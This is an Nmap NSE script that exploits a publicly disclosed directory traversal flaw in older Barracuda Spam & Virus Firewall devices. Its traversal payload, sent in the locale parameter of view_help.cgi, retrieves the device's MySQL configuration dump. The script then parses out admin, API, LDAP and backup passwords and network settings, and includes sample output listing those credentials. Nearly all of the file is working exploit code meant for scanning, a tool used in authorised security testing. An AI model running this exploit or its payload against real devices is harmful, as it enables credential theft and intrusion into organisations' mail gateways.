scripts/http-barracuda-dir-traversal.nse


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"

description = [[
Attempts to retrieve the configuration settings from a Barracuda
Networks Spam & Virus Firewall device using the directory traversal
vulnerability described at
http://seclists.org/fulldisclosure/2010/Oct/119.

This vulnerability is in the "locale" parameter of
"/cgi-mod/view_help.cgi" or "/cgi-bin/view_help.cgi", allowing the
information to be retrieved from a MySQL database dump.  The web
administration interface runs on port 8000 by default.

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval
Original exploit by ShadowHatesYou <Shadow@SquatThis.net>
For more information, see:
http://seclists.org/fulldisclosure/2010/Oct/119
http://www.exploit-db.com/exploits/15130/
]]

---
-- @usage
-- nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>
--
-- @args http-max-cache-size
--       Set max cache size. The default value is 100,000.
--       Barracuda config files vary in size mostly due to the number
--       of users. Using a max cache size of 5,000,000 bytes should be
--       enough for config files containing up to 5,000 users.
--
-- @output
-- PORT   STATE SERVICE   REASON
-- 8000/tcp open  http    syn-ack Barracuda Spam firewall http config
-- | http-barracuda-dir-traversal:
-- | Users: 256
-- | Device: Barracuda Spam Firewall
-- | Version: 4.1.0.0
-- | Hostname: barracuda
-- | Domain: example.com
-- | Timezone: America/Chicago
-- | Language: en_US
-- | Password: 123456
-- | API Password: 123456
-- | MTA SASL LDAP Password: 123456
-- | Gateway: 192.168.1.1
-- | Primary DNS: 192.168.1.2
-- | Secondary DNS: 192.168.1.3
-- | DNS Cache: No
-- | Backup Server: ftp.example.com
-- | Backup Port: 21
-- | Backup Type: ftp
-- | Backup Username: user
-- | Backup Password: 123456
-- | NTP Enabled: Yes
-- | NTP Server: update01.barracudanetworks.com
-- | SSH Enabled: Yes
-- | BRTS Enabled: No
-- | BRTS Server: fp.bl.barracudanetworks.com
-- | HTTP Port: 8000
-- | HTTP Disabled: No
-- | HTTPS Port: 443
-- | HTTPS Only: No
-- |
-- | Vulnerable to directory traversal vulnerability:
-- |_http://seclists.org/fulldisclosure/2010/Oct/119
--
-- @changelog
-- 2011-06-08 - created by Brendan Coles - itsecuritysolutions.org
-- 2011-06-10 - added user count
--            - looped path detection
-- 2011-06-15 - looped system info extraction
--            - changed service portrule to "barracuda"
--

author = "Brendan Coles"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "exploit", "auth"}


portrule = shortport.port_or_service (8000, "barracuda", {"tcp"})

action = function(host, port)

  local result = {}
  local paths = {"/cgi-bin/view_help.cgi", "/cgi-mod/view_help.cgi"}
  local payload = "?locale=/../../../../../../../mail/snapshot/config.snapshot%00"
  local user_count = 0
  local config_file = ""

  -- Loop through vulnerable files
  stdnse.debug1("Connecting to %s:%s", host.targetname or host.ip, port.number)
  for _, path in ipairs(paths) do

    -- Retrieve file
    local data = http.get(host, port, tostring(path))
    if data and data.status then

      -- Check if file exists
      stdnse.debug1("HTTP %s: %s", data.status, tostring(path))
      if tostring(data.status):match("200") then

        -- Attempt config file retrieval with LFI exploit
        stdnse.debug1("Exploiting: %s", tostring(path .. payload))
        data = http.get(host, port, tostring(path .. payload))
        if data and data.status and tostring(data.status):match("200") and data.body and data.body ~= "" then

          -- Check if the HTTP response contains a valid config file in MySQL database dump format
          if string.match(data.body, "DROP TABLE IF EXISTS config;") and string.match(data.body, "barracuda%.css") then
            config_file = data.body
            break
          end

        else
          stdnse.debug1("Failed to retrieve file: %s", tostring(path .. payload))
        end

      end

    else
      stdnse.debug1("Failed to retrieve file: %s", tostring(path))
    end

  end

  -- No config file found
  if config_file == "" then
    stdnse.debug1("%s:%s is not vulnerable or connection timed out.", host.targetname or host.ip, port.number)
    return
  end

  -- Extract system info from config file in MySQL dump format
  stdnse.debug1("Exploit success! Extracting system info from MySQL database dump")

  -- Count users
  if string.match(config_file, "'user_default_email_address',") then
    for _ in string.gmatch(config_file, "'user_default_email_address',") do user_count = user_count + 1 end
  end
  table.insert(result, string.format("Users: %s", user_count))

  -- Extract system info
  local vars = {
    {"Device", "branding_device_name"},
    {"Version","httpd_last_release_notes_version_read"},
    {"Hostname","system_default_hostname"},
    {"Domain","system_default_domain"},
    {"Timezone","system_timezone"},
    {"Language","default_ndr_lang"},
    {"Password","system_password"},
    {"API Password","api_password"},
    {"MTA SASL LDAP Password","mta_sasl_ldap_advanced_password"},
    {"Gateway","system_gateway"},
    {"Primary DNS","system_primary_dns_server"},
    {"Secondary DNS","system_secondary_dns_server"},
    {"DNS Cache","dns_cache"},
    {"Backup Server","backup_server"},
    {"Backup Port","backup_port"},
    {"Backup Type","backup_type"},
    {"Backup Username","backup_username"},
    {"Backup Password","backup_password"},
    {"NTP Enabled","system_ntp"},
    {"NTP Server","system_ntp_server"},
    {"SSH Enabled","system_ssh_enable"},
    {"BRTS Enabled","brts_enable"},
    {"BRTS Server","brts_lookup_domain"},
    {"HTTP Port","http_port"},
    {"HTTP Disabled","http_shutoff"},
    {"HTTPS Port","https_port"},
    {"HTTPS Only","https_only"},
  }
  for _, var in ipairs(vars) do
    local var_match = string.match(config_file, string.format("'%s','([^']+)','global',", var[2]))
    if var_match then table.insert(result, string.format("%s: %s", var[1], var_match)) end
  end

  table.insert(result, "\nVulnerable to directory traversal vulnerability:\nhttp://seclists.org/fulldisclosure/2010/Oct/119")

  -- Return results
  return stdnse.format_output(true, result)

end